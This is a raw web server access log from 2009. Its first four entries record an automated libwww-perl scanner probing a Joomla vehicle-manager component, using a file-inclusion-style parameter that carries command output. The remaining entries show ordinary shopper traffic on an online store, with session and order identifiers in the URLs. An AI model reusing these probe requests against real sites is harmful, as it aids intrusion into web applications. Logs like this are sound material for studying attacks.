202.44.32.9 - - [23/Sep/2009:00:49:47 -0400] "GET /logs/error_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 259 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:49:48 -0400] "GET /logs/error_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 259 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:49:48 -0400] "GET /logs/error_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 259 "-" "libwww-perl/5.806"
202.44.32.9 - - [23/Sep/2009:00:49:49 -0400] "GET /logs/error_log.Q109082300//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=uid=30(wwwrun)%20gid=8(www)%20groups=8(www)%0A? HTTP/1.1" 404 259 "-" "libwww-perl/5.806"
98.195.56.213 - - [23/Sep/2009:00:50:29 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01532D4608E80200BD0705Z+M37+ENG HTTP/1.1" 200 44463 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D400DD8E2007B3705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:44 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01532D4608E80200BD0705Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:44 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD HTTP/1.1" 200 34407 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/printheader.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
98.195.56.213 - - [23/Sep/2009:00:50:45 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01532D420DE8620004A705Z+WSEQ(S0020):1+OKEY(A0190):001385725000S0060174+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
